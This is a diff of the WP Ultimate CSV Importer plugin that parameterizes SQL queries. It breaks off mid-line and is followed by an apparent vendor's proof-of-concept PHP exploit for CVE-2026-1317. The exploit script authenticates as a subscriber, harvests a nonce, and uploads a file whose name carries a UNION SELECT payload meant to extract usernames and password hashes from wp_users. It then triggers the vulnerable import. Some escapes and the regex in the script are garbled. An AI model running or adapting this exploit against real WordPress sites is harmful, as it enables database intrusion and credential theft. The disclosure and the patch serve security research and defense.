-							$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
-

-							$query = "SELECT * FROM " . $wpdb->prefix . "terms WHERE term_id IN ($placeholders)";
-							$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
-							foreach ($results as $result) {
-								$term_id = $result->term_id;
-
-								// Admin link
-								$admin_link = admin_url("term.php?taxonomy=post_tag&tag_ID={$term_id}");
-
-								// Weblink
-								$site_url = get_site_url();
+					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
+
+					if (!empty($cat_ids)) {
+
+						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
+
+
+						$query = "SELECT * FROM " . $wpdb->prefix . "terms WHERE term_id IN ($placeholders)";
+						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
+						foreach ($results as $result) {
+							$term_id = $result->term_id;
+
+							// Admin link
+							$admin_link = admin_url("term.php?taxonomy=post_tag&tag_ID={$term_id}");
+
+							// Weblink
+							$site_url = get_site_url();
 								$term_link = trailingslashit($site_url) . 'index.php/'.'tag/' . $result->slug . '/';
-
-								$result->admin_link = $admin_link;
-								$result->weblink = $term_link;
-							}
-
-					}
-
+
+							$result->admin_link = $admin_link;
+							$result->weblink = $term_link;
+						}
+
+					}
+
 				}
 				//users log
-				elseif(isset($found_users) && $found_users){
+				elseif (isset($found_users) && $found_users) {
 					global $wpdb;
-
+
 					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));

 					if (!empty($cat_ids)) {
 						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
-
+
 						// Query to get user information, including the ID
 						$query = "SELECT ID, user_login, user_nicename,display_name, user_email, user_url FROM " . $wpdb->prefix . "users WHERE ID IN ($placeholders)";
 						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
-
-
-				}
+
+
+					}

 				}
 				//comment logs
-				elseif(isset($found_comment) && $found_comment){
+				elseif (isset($found_comment) && $found_comment) {
 					global $wpdb;
-
+
 					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));

 					if (!empty($cat_ids)) {
 						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
-
+
 						// Query to get user information, including the ID
 						$query = "SELECT comment_post_id, comment_author, comment_author_url,comment_content, comment_type FROM " . $wpdb->prefix . "comments WHERE comment_ID IN ($placeholders)";
 						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
-

-				}
-			}

-				else{
+					}
+				} else {
 					global $wpdb;

-		$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));
+					$cat_ids = $wpdb->get_col($wpdb->prepare("SELECT post_id FROM " . $wpdb->prefix . "summary WHERE event_id = %s", $get_event_key));

-		if (!empty($cat_ids)) {
-    	$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));
+					if (!empty($cat_ids)) {
+						$placeholders = implode(',', array_fill(0, count($cat_ids), '%d'));

-   		 $query = "SELECT ID, post_type, post_title, post_content, post_excerpt, post_status, post_name, guid FROM " . $wpdb->prefix . "posts WHERE ID IN ($placeholders)";
-   		 $results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
+						$query = "SELECT ID, post_type, post_title, post_content, post_excerpt, post_status, post_name, guid FROM " . $wpdb->prefix . "posts WHERE ID IN ($placeholders)";
+						$results = $wpdb->get_results($wpdb->prepare($query, ...$cat_ids));
+
+						$media_query = "SELECT post_id, associated_media, failed_media FROM " . $wpdb->prefix . "summary WHERE event_id = %s";
+						$media_results = $wpdb->get_results($wpdb->prepare($media_query, $get_event_key), OBJECT_K);
+
+						if ($media_results) {
+							foreach ($results as $result) {
+								if (isset($media_results[$result->ID])) {
+									$result->associated_media = $media_results[$result->ID]->associated_media;
+									$result->failed_media = $media_results[$result->ID]->failed_media;
+								} else {
+									$result->associated_media = null;
+									$result->failed_media = null;
+								}
+							}
+						} else {
+
+							foreach ($results as $result) {
+								$result->associated_media = null;
+								$result->failed_media = null;
+							}
+						}
+					} else {
+
+						$results = [];
+					}
+
+				}

-   		 $media_query = "SELECT post_id, associated_media, failed_media FROM " . $wpdb->prefix . "summary WHERE event_id = %s";
-   		 $media_results = $wpdb->get_results($wpdb->prepare($media_query, $get_event_key), OBJECT_K);
-
-    if ($media_results) {
-        foreach ($results as $result) {
-            if (isset($media_results[$result->ID])) {
-                $result->associated_media = $media_results[$result->ID]->associated_media;
-                $result->failed_media = $media_results[$result->ID]->failed_media;
-            } else {
-                $result->associated_media = null;
-                $result->failed_media = null;
-            }
-        }
-    } else {
-
-        foreach ($results as $result) {
-            $result->associated_media = null;
-            $result->failed_media = null;
-        }
-    }
-		} else {
-
-    $results = [];
-			}

-			}
-
-
 				$json_posts = wp_json_encode($results);
 				$posts_array = json_decode($json_posts, true);
-
+
 				if (empty($posts_array)) {
 					$response['success'] = false;
 					$response['message'] = 'No posts found or failed to decode JSON.';
 					echo wp_json_encode($response);
 					wp_die();
 				}
-
+
 				$csv_file = fopen('php://temp', 'w');
 				if (!empty($posts_array)) {
 					fputcsv($csv_file, array_keys($posts_array[0]));
 				}
-
+
 				foreach ($posts_array as $post) {
 					fputcsv($csv_file, $post);
 				}
 				rewind($csv_file);
-
+
 				$csv_contents = stream_get_contents($csv_file);
 				fclose($csv_file);
-
+
 				// Save the CSV data to the file
 				file_put_contents($file_path, $csv_contents);
-
+
 				$response['success'] = true;
 				$response['file_url'] = $file_url;
 				echo wp_json_encode($response);
@@ -614,257 +612,260 @@
 			}
 		}
 	}
-
-//failed media log download
-public function download_failed_log() {
-	check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
-
-	global $wpdb;
-
-	$response = [];
-	$filename = sanitize_file_name($_POST['filename']);
-	$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
-	$hash_key=isset($_POST['hashkey'] ) ? sanitize_text_field($_POST['hashkey']) : '';
-	$module  = sanitize_text_field($_POST['type']);
-		if(empty($hash_key)){
+
+	//failed media log download
+	public function download_failed_log()
+	{
+		check_ajax_referer('smack-ultimate-csv-importer', 'securekey');
+
+		global $wpdb;
+
+		$response = [];
+		$filename = sanitize_file_name($_POST['filename']);
+		$revision = isset($_POST['revision']) ? sanitize_text_field($_POST['revision']) : '';
+		$hash_key = isset($_POST['hashkey']) ? sanitize_text_field($_POST['hashkey']) : '';
+		$module = sanitize_text_field($_POST['type']);
+		if (empty($hash_key)) {
 			$event_key_result = $wpdb->get_results($wpdb->prepare("SELECT eventKey FROM {$wpdb->prefix}smackuci_events WHERE revision = %d AND original_file_name = %s", $revision, $filename));
-		$get_event_key = $event_key_result[0]->eventKey;
-
-		}
-		else{
-			$get_event_key=$hash_key;
-		}
-
-	if (empty($get_event_key)) {
-		$response['success'] = false;
-		$response['message'] = 'Log not exists';
-		echo wp_json_encode($response);
-		wp_die();
-	} else {
+			$get_event_key = $event_key_result[0]->eventKey;

-		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/failed_media_logs/' . $get_event_key . '/';
-
-		if (!is_dir($upload_dir)) {
-			if (!wp_mkdir_p($upload_dir)) {
-				return null;
-			}
-		}
-		chmod($upload_dir, 0777);
-
-		$index_file = $upload_dir . 'index.php';
-		if (!file_exists($index_file)) {
-			$index_content = '<?php' . PHP_EOL . '?>';
-			file_put_contents($index_file, $index_content);
-			chmod($index_file, 0644);
+		} else {
+			$get_event_key = $hash_key;
 		}

-		$baseFileName = 'FailedMedia';
-		$export_type = 'csv';
-		$file_path = $upload_dir . $baseFileName . '.' . $export_type;
-		$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/failed_media_logs/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;
-
-		if (file_exists($file_path)) {
-			// If the file already exists, return the file URL
-			$response['success'] = true;
-			$response['file_url'] = $file_url;
+		if (empty($get_event_key)) {
+			$response['success'] = false;
+			$response['message'] = 'Log not exists';
 			echo wp_json_encode($response);
 			wp_die();
-
 		} else {
-
-			if($module == 'Media'){
-				$results = $wpdb->get_results(
-					$wpdb->prepare(
-						"SELECT  media_id, title,file_name, caption,description,alt_text,actual_url,status ,file_url
-						 FROM " . $wpdb->prefix . "failed_media
-						 WHERE event_id = %s AND status = %s",
-						$get_event_key,
-						'failed'
-					)
-				);
+
+			$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/failed_media_logs/' . $get_event_key . '/';
+
+			if (!is_dir($upload_dir)) {
+				if (!wp_mkdir_p($upload_dir)) {
+					return null;
+				}
 			}
-			else{
-				$results = $wpdb->get_results(
-					$wpdb->prepare(
-						"SELECT  media_id,title,post_id,actual_url,status
-						 FROM " . $wpdb->prefix . "failed_media
-						 WHERE event_id = %s AND status = %s",
-						$get_event_key,
-						'failed'
-					)
-				);
+			chmod($upload_dir, 0777);
+
+			$index_file = $upload_dir . 'index.php';
+			if (!file_exists($index_file)) {
+				$index_content = '<?php' . PHP_EOL . '?>';
+				file_put_contents($index_file, $index_content);
+				chmod($index_file, 0644);
 			}
-
-			$json_posts = wp_json_encode($results);
-			$posts_array = json_decode($json_posts, true);
-
-			if (empty($posts_array)) {
-				$response['success'] = false;
-				$response['message'] = 'No posts found or failed to decode JSON.';
+
+			$baseFileName = 'FailedMedia';
+			$export_type = 'csv';
+			$file_path = $upload_dir . $baseFileName . '.' . $export_type;
+			$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/failed_media_logs/' . $get_event_key . '/' . $baseFileName . '.' . $export_type;
+
+			if (file_exists($file_path)) {
+				// If the file already exists, return the file URL
+				$response['success'] = true;
+				$response['file_url'] = $file_url;
 				echo wp_json_encode($response);
 				wp_die();
-			}

-			$csv_file = fopen('php://temp', 'w');
-			if (!empty($posts_array)) {
-				fputcsv($csv_file, array_keys($posts_array[0]));
-			}
+			} else {

-			foreach ($posts_array as $post) {
-				fputcsv($csv_file, $post);
-			}
-			rewind($csv_file);
+				if ($module == 'Media') {
+					$results = $wpdb->get_results(
+						$wpdb->prepare(
+							"SELECT  media_id, title,file_name, caption,description,alt_text,actual_url,status ,file_url
+						 FROM " . $wpdb->prefix . "failed_media
+						 WHERE event_id = %s AND status = %s",
+							$get_event_key,
+							'failed'
+						)
+					);
+				} else {
+					$results = $wpdb->get_results(
+						$wpdb->prepare(
+							"SELECT  media_id,title,post_id,actual_url,status
+						 FROM " . $wpdb->prefix . "failed_media
+						 WHERE event_id = %s AND status = %s",
+							$get_event_key,
+							'failed'
+						)
+					);
+				}
+
+				$json_posts = wp_json_encode($results);
+				$posts_array = json_decode($json_posts, true);
+
+				if (empty($posts_array)) {
+					$response['success'] = false;
+					$response['message'] = 'No posts found or failed to decode JSON.';
+					echo wp_json_encode($response);
+					wp_die();
+				}
+
+				$csv_file = fopen('php://temp', 'w');
+				if (!empty($posts_array)) {
+					fputcsv($csv_file, array_keys($posts_array[0]));
+				}

-			$csv_contents = stream_get_contents($csv_file);
-			fclose($csv_file);
+				foreach ($posts_array as $post) {
+					fputcsv($csv_file, $post);
+				}
+				rewind($csv_file);

+				$csv_contents = stream_get_contents($csv_file);
+				fclose($csv_file);

-			// Save the CSV data to the file
-			file_put_contents($file_path, $csv_contents);

-			$response['success'] = true;
-			$response['file_url'] = $file_url;
-			echo wp_json_encode($response);
-			wp_die();
+				// Save the CSV data to the file
+				file_put_contents($file_path, $csv_contents);
+
+				$response['success'] = true;
+				$response['file_url'] = $file_url;
+				echo wp_json_encode($response);
+				wp_die();
+			}
 		}
 	}
-}


 	/**
 	 * Saves event logs in database.
 	 * @param  string $hash_key - File hash key
-     * @param  string $selected_type - Post type
+	 * @param  string $selected_type - Post type
 	 * @param  string $file_name - File name
 	 * @param  string $total_rows - Total rows in file
 	 */
-    public function manage_records($hash_key ,$selected_type , $file_name , $total_rows){
-        global $wpdb;
-        $log_table_name = $wpdb->prefix ."import_detail_log";
-
-        $file_extension = pathinfo($file_name, PATHINFO_EXTENSION);
-        $file_extn = '.' . $file_extension;
-        $get_local_filename = explode($file_extn, $file_name);
-        $extension_object = new ExtensionHandler;
-        $import_type = $extension_object->import_name_as($selected_type);
+	public function manage_records($hash_key, $selected_type, $file_name, $total_rows)
+	{
+		global $wpdb;
+		$file_name = sanitize_file_name($file_name);
+		$log_table_name = $wpdb->prefix . "import_detail_log";

-        $imported_on = date('Y-m-d h:i:s');
+		$file_extension = pathinfo($file_name, PATHINFO_EXTENSION);
+		$file_extn = '.' . $file_extension;
+		$get_local_filename = explode($file_extn, $file_name);
+		$extension_object = new ExtensionHandler;
+		$import_type = $extension_object->import_name_as($selected_type);
+
+		$imported_on = date('Y-m-d h:i:s');
 		$month = date("M", strtotime($imported_on));
-        $year = date("Y", strtotime($imported_on));
-        $file_path = '/smack_uci_uploads/imports/' . $hash_key . '/' . $hash_key;
-
-        $get_name = $wpdb->get_results( "SELECT original_file_name FROM {$wpdb->prefix}smackuci_events " );
+		$year = date("Y", strtotime($imported_on));
+		$file_path = '/smack_uci_uploads/imports/' . $hash_key . '/' . $hash_key;
+
+		$get_name = $wpdb->get_results("SELECT original_file_name FROM {$wpdb->prefix}smackuci_events ");

-        if(!empty($get_name)){
-			foreach($get_name as $name_values){
+		if (!empty($get_name)) {
+			foreach ($get_name as $name_values) {
 				$inserted_name_values[] = $name_values->original_file_name;
-            }
-            if(in_array($file_name , $inserted_name_values)){
-                $get_revision = $wpdb->get_results( "SELECT revision FROM {$wpdb->prefix}smackuci_events WHERE original_file_name = '$file_name' " );
-				foreach($get_revision as $value){
-                    $last_version_id = $value->revision;
-                }
-                $revision = $last_version_id + 1;
-                $name = $get_local_filename[0] .'-'. $revision . $file_extn;
-            }
-			else{
-                $name = $get_local_filename[0] . '-1' . $file_extn;
-                $revision = 1;
-            }
-        }
-        else{
-            $name = $get_local_filename[0] . '-1' . $file_extn;
-            $revision = 1;
-        }
+			}
+			if (in_array($file_name, $inserted_name_values)) {
+				$get_revision = $wpdb->get_results($wpdb->prepare("SELECT revision FROM {$wpdb->prefix}smackuci_events WHERE original_file_name = %s ", $file_name));
+				foreach ($get_revision as $value) {
+					$last_version_id = $value->revision;
+				}
+				$revision = $last_version_id + 1;
+				$name = $get_local_filename[0] . '-' . $revision . $file_extn;
+			} else {
+				$name = $get_local_filename[0] . '-1' . $file_extn;
+				$revision = 1;
+			}
+		} else {
+			$name = $get_local_filename[0] . '-1' . $file_extn;
+			$revision = 1;
+		}

-        $get_data =  $wpdb->get_results("SELECT skipped , created , updated,failed FROM $log_table_name WHERE hash_key = '$hash_key' ");
+		$get_data = $wpdb->get_results($wpdb->prepare("SELECT skipped , created , updated,failed FROM $log_table_name WHERE hash_key = %s ", $hash_key));
 		$skipped_count = $get_data[0]->skipped;
-			$created_count = $get_data[0]->created;
-			$updated_count = $get_data[0]->updated;
-			$failed_count = $get_data[0]->failed;
-			$processed = $created_count + $updated_count + $skipped_count;
-			if($processed > $total_rows)
-				$processed = $created_count;
-
-		$smack_uci_table = $wpdb->prefix."smackuci_events";
-
-		$getid = $wpdb->get_results("SELECT distinct( id ) from {$wpdb->prefix}smackuci_events where import_type = '$import_type' and eventKey = '$hash_key'",ARRAY_A);
-		if(!empty($getid)){
-			$wpdb->update($smack_uci_table, array(
-				'created' => "{$created_count}",
-				'updated' => "{$updated_count}",
-				'skipped' => "{$skipped_count}",
-				'failed' => "{$failed_count}",
-				'processed' => "{$processed}",
-				'last_activity' => "{$imported_on}",
-				),
+		$created_count = $get_data[0]->created;
+		$updated_count = $get_data[0]->updated;
+		$failed_count = $get_data[0]->failed;
+		$processed = $created_count + $updated_count + $skipped_count;
+		if ($processed > $total_rows)
+			$processed = $created_count;
+
+		$smack_uci_table = $wpdb->prefix . "smackuci_events";
+
+		$getid = $wpdb->get_results($wpdb->prepare("SELECT distinct( id ) from {$wpdb->prefix}smackuci_events where import_type = %s and eventKey = %s", $import_type, $hash_key), ARRAY_A);
+		if (!empty($getid)) {
+			$wpdb->update(
+				$smack_uci_table,
+				array(
+					'created' => "{$created_count}",
+					'updated' => "{$updated_count}",
+					'skipped' => "{$skipped_count}",
+					'failed' => "{$failed_count}",
+					'processed' => "{$processed}",
+					'last_activity' => "{$imported_on}",
+				),
 				array('id' => $getid[0]['id'])
 			);
+		} else {
+			$wpdb->insert(
+				$smack_uci_table,
+				array(
+					'revision' => $revision,
+					'name' => "{$name}",
+					'original_file_name' => "{$file_name}",
+					'import_type' => "{$import_type}",
+					'filetype' => "{$file_extension}",
+					'filepath' => "{$file_path}",
+					'eventKey' => "{$hash_key}",
+					'registered_on' => $imported_on,
+					'processing' => 1,
+					'count' => $total_rows,
+					'processed' => $created_count,
+					'created' => $created_count,
+					'updated' => $updated_count,
+					'skipped' => $skipped_count,
+					'failed' => $failed_count,
+					'last_activity' => $imported_on,
+					'month' => $month,
+					'year' => $year
+				),
+				array('%d', '%s', '%s', '%s', '%s', '%s', '%s', '%d', '%d', '%d', '%d', '%d', '%d', '%s', '%s', '%s')
+			);
 		}
-		else {
-        $wpdb->insert($smack_uci_table, array(
-            'revision' => $revision,
-            'name' => "{$name}",
-            'original_file_name' => "{$file_name}",
-            'import_type' => "{$import_type}",
-            'filetype' => "{$file_extension}",
-            'filepath' => "{$file_path}",
-            'eventKey' => "{$hash_key}",
-            'registered_on' => $imported_on,
-            'processing' => 1,
-            'count' => $total_rows,
-            'processed' => $created_count,
-            'created' => $created_count,
-            'updated' => $updated_count,
-            'skipped' => $skipped_count,
-			'failed' => $failed_count,
-            'last_activity' => $imported_on,
-            'month' => $month,
-            'year' => $year
-        ),
-            array('%d', '%s', '%s', '%s', '%s', '%s', '%s', '%d', '%d', '%d', '%d', '%d', '%d', '%s','%s','%s')
-		);
 	}
-    }
 	/**
 	 * insert log file log.
 	 */
-	public function Insert_log_details($data, $line_number, $hash_key) {
+	public function Insert_log_details($data, $line_number, $hash_key)
+	{
 		if (empty($data)) {
 			return null; // Exit function if data is empty
 		}
-		if(!isset($data[$line_number]) || !is_array($data[$line_number])){
+		if (!isset($data[$line_number]) || !is_array($data[$line_number])) {
 			$line_number = $line_number - 1;
-			if(!isset($data[$line_number]) || !is_array($data[$line_number])){
+			if (!isset($data[$line_number]) || !is_array($data[$line_number])) {
 				return null;
 			}
 		}

 		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/imports/import_logs/' . $hash_key . '/';
-
+
 		if (!is_dir($upload_dir)) {
 			if (!wp_mkdir_p($upload_dir)) {
 				return null;
 			}
 		}
-
+
 		chmod($upload_dir, 0777);
-
+
 		$index_file = $upload_dir . 'index.php';
 		if (!file_exists($index_file)) {
 			$index_content = '<?php' . PHP_EOL . '?>';
 			file_put_contents($index_file, $index_content);
 			chmod($index_file, 0644);
 		}
-
+
 		$baseFileName = 'summary_log';
 		$export_type = 'csv';
 		$filePath = $upload_dir . $baseFileName . '.' . $export_type;
 		$fileURL = network_home_url() . '/wp-content/uploads/smack_uci_uploads/imports/import_logs/' . $hash_key . '/' . $baseFileName . '.' . $export_type;
-
+
 		$headers = array_keys($data[$line_number]);
-
-
+
+
 		// Read existing CSV file and store lines
 		$lines = [];
 		if (file_exists($filePath)) {
@@ -877,7 +878,7 @@
 			// If file does not exist, create header row
 			$lines[] = $headers;
 		}
-
+
 		// Update the specific line numbers
 		foreach ($data as $index => $row) {
 			$new_line = [];
@@ -886,10 +887,10 @@
 			}
 			$lines[$line_number + $index - 1] = $new_line;
 		}
-
+
 		// Write back the updated lines to the CSV file
 		$file = fopen($filePath, 'w');
-		if($file){
+		if ($file) {
 			foreach ($lines as $line) {
 				fputcsv($file, $line);
 			}
@@ -898,32 +899,33 @@
 		chmod($filePath, 0644);
 		return isset($fileURL) ? $fileURL : null;
 	}
-
+
 	/**
 	 * Starts the failed media download
 	 */
-	public function failedMediaExport($data, $line_number, $hash_key) {
+	public function failedMediaExport($data, $line_number, $hash_key)
+	{
 		$baseFileName = 'failed_media_log';
 		$export_type = 'csv';
 		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/imports/failed_media_logs/' . $hash_key . '/';
 		$file_path = $upload_dir . $baseFileName . '.' . $export_type;
 		$file_url = network_home_url() . '/wp-content/uploads/smack_uci_uploads/imports/failed_media_logs/' . $hash_key . '/' . $baseFileName . '.' . $export_type;
 		$headers = ['post_id', 'title', 'media_id', 'actual_url'];
-
+
 		if (empty($data)) {
 			if (!is_dir($upload_dir) && !wp_mkdir_p($upload_dir)) {
 				return null;
 			}
-
+
 			if (!file_exists($file_path) || !is_readable($file_path)) {
 				return null;
 			}
-
+
 			$file_handle = fopen($file_path, 'r');
 			if ($file_handle === false) {
 				return null;
 			}
-
+
 			$data_found = false;
 			while (($row = fgetcsv($file_handle)) !== false) {
 				if (!empty(array_filter($row))) {
@@ -932,22 +934,22 @@
 				}
 			}
 			fclose($file_handle);
-
+
 			return $data_found ? $file_url : null;
 		}
-
+
 		if (!is_dir($upload_dir) && !wp_mkdir_p($upload_dir)) {
 			return null;
 		}
-
+
 		chmod($upload_dir, 0777);
-
+
 		$index_file = $upload_dir . 'index.php';
 		if (!file_exists($index_file)) {
 			file_put_contents($index_file, "<?phpn?>");
 			chmod($index_file, 0644);
 		}
-
+
 		$lines = [];
 		if (file_exists($file_path)) {
 			$file = fopen($file_path, 'r');
@@ -958,7 +960,7 @@
 		} else {
 			$lines[] = $headers;
 		}
-
+
 		foreach ($data as $index => $row) {
 			$new_line = [];
 			foreach ($headers as $header) {
@@ -966,54 +968,55 @@
 			}
 			$lines[$line_number + $index - 1] = $new_line;
 		}
-
+
 		$file = fopen($file_path, 'w');
 		foreach ($lines as $line) {
 			fputcsv($file, $line);
 		}
 		fclose($file);
-
+
 		chmod($file_path, 0644);
-
+
 		return $file_url;
 	}
-
+
 	/**
 	 * Starts the media download
 	 */
-	public function mediaExport($data,$line_number,$hash_key){
+	public function mediaExport($data, $line_number, $hash_key)
+	{
 		if (empty($data)) {
 			return null; // Exit function if data is empty
 		}
-		if(!isset($data[$line_number]) || !is_array($data[$line_number])){
+		if (!isset($data[$line_number]) || !is_array($data[$line_number])) {
 			$line_number = $line_number - 1;
-			if(!isset($data[$line_number]) || !is_array($data[$line_number])){
+			if (!isset($data[$line_number]) || !is_array($data[$line_number])) {
 				return null;
 			}
 		}
 		$upload_dir = WP_CONTENT_DIR . '/uploads/smack_uci_uploads/imports/media_logs/' . $hash_key . '/';
-
+
 		if (!is_dir($upload_dir)) {
 			if (!wp_mkdir_p($upload_dir)) {
 				return null;
 			}
 		}
-
+
 		chmod($upload_dir, 0777);
-
+
 		$index_file = $upload_dir . 'index.php';
 		if (!file_exists($index_file)) {
 			$index_content = '<?php' . PHP_EOL . '?>';
 			file_put_contents($index_file, $index_content);
 			chmod($index_file, 0644);
 		}
-
+
 		$baseFileName = 'media_log';
 		$export_type = 'csv';
 		$filePath = $upload_dir . $baseFileName . '.' . $export_type;
 		$fileURL = network_home_url() . '/wp-content/uploads/smack_uci_uploads/imports/media_logs/' . $hash_key . '/' . $baseFileName . '.' . $export_type;
 		$headers = array_keys($data[$line_number]);
-
+
 		// Read existing CSV file and store lines
 		$lines = [];
 		if (file_exists($filePath)) {
@@ -1026,7 +1029,7 @@
 			// If file does not exist, create header row
 			$lines[] = $headers;
 		}
-
+
 		// Update the specific line numbers
 		foreach ($data as $index => $row) {
 			$new_line = [];
@@ -1035,14 +1038,14 @@
 			}
 			$lines[$line_number + $index - 1] = $new_line;
 		}
-
+
 		// Write back the updated lines to the CSV file
 		$file = fopen($filePath, 'w');
 		foreach ($lines as $line) {
 			fputcsv($file, $line);
 		}
 		fclose($file);
-
+
 		chmod($filePath, 0644);
 		return isset($fileURL) ? $fileURL : null;
 	}
--- a/wp-ultimate-csv-importer/uploadModules/UrlUpload.php
+++ b/wp-ultimate-csv-importer/uploadModules/UrlUpload.php
@@ -6,32 +6,35 @@
  */

 namespace SmackcodersFCSV;
- require_once(__DIR__.'/../vendor/autoload.php');
+require_once(__DIR__ . '/../vendor/autoload.php');

 use Lea

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1317 - WP Import – Ultimate CSV XML Importer for WordPress <= 7.37 - Authenticated (Subscriber+) SQL Injection via File Name

<?php
/**
 * DISCLAIMER: For authorized security testing only. Do not use against systems you do not own or have permission to test.
 * This PoC demonstrates the SQL injection vulnerability via malicious filename.
 * Requirements: Subscriber+ account, 'Single Import/Export' feature enabled, PHP < 8.0
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$cookie_file = tempnam(sys_get_temp_dir(), 'cve_2026_1317_');

$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $login_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => http_build_query([
        'log' => $username,
        'pwd' => $password,
        'wp-submit' => 'Log In',
        'redirect_to' => $target_url . '/wp-admin/',
        'testcookie' => '1'
    ]),
    CURLOPT_COOKIEJAR => $cookie_file,
    CURLOPT_COOKIEFILE => $cookie_file,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_FOLLOWLOCATION => true,
    CURLOPT_SSL_VERIFYPEER => false,
    CURLOPT_SSL_VERIFYHOST => false
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code !== 200 || strpos($response, 'Dashboard') === false) {
    die("Authentication failed. Check credentials.");
}

// Step 2: Extract nonce from plugin page (required for AJAX requests)
$plugin_page_url = $target_url . '/wp-admin/admin.php?page=wp-ultimate-csv-importer';
curl_setopt_array($ch, [
    CURLOPT_URL => $plugin_page_url,
    CURLOPT_POST => false,
    CURLOPT_POSTFIELDS => null
]);

$response = curl_exec($ch);

// Extract nonce from page (simplified - actual implementation would need proper regex)
$nonce = '';
if (preg_match('/"securekey"s*value="([^"]+)"/', $response, $matches)) {
    $nonce = $matches[1];
}

if (empty($nonce)) {
    die("Could not extract nonce. Plugin may not be active or accessible.");
}

// Step 3: Upload file with malicious filename containing SQL injection payload
// The filename will be stored in the database and later used in vulnerable SQL queries
$upload_url = $target_url . '/wp-admin/admin-ajax.php';
$malicious_filename = "test_file' UNION SELECT user_login,user_pass,1,2 FROM wp_users WHERE '1'='1.csv";

// Create a temporary CSV file for upload
$temp_csv = tempnam(sys_get_temp_dir(), 'malicious_');
file_put_contents($temp_csv, "id,namen1,test");

$post_fields = [
    'action' => 'smack_uci_upload_file',
    'securekey' => $nonce,
    'file' => new CURLFile($temp_csv, 'text/csv', $malicious_filename),
    'upload_type' => 'single' // Requires Single Import/Export feature enabled
];

curl_setopt_array($ch, [
    CURLOPT_URL => $upload_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $post_fields,
    CURLOPT_HTTPHEADER => ['Expect:'] // Remove Expect header for large posts
]);

$response = curl_exec($ch);
$upload_result = json_decode($response, true);

if (json_last_error() !== JSON_ERROR_NONE || !isset($upload_result['success'])) {
    echo "File upload may have failed. Response: " . htmlspecialchars($response) . "n";
}

// Step 4: Trigger import process which will use the malicious filename in SQL queries
// The plugin will retrieve the filename from database and use it in vulnerable queries
$trigger_url = $target_url . '/wp-admin/admin-ajax.php';
$trigger_data = [
    'action' => 'smack_uci_import_data',
    'securekey' => $nonce,
    'hash_key' => $upload_result['hash_key'] ?? 'extracted_from_previous_step',
    'selected_type' => 'Posts',
    'import_mode' => 'Insert'
];

curl_setopt_array($ch, [
    CURLOPT_URL => $trigger_url,
    CURLOPT_POST => true,
    CURLOPT_POSTFIELDS => $trigger_data
]);

$response = curl_exec($ch);

// The SQL injection would execute during the import process
// In a real exploit, the attacker would extract the query results via error messages or timing attacks

echo "Exploit attempt completed. Check database logs for SQL injection evidence.n";

// Cleanup
curl_close($ch);
unlink($cookie_file);
unlink($temp_csv);
?>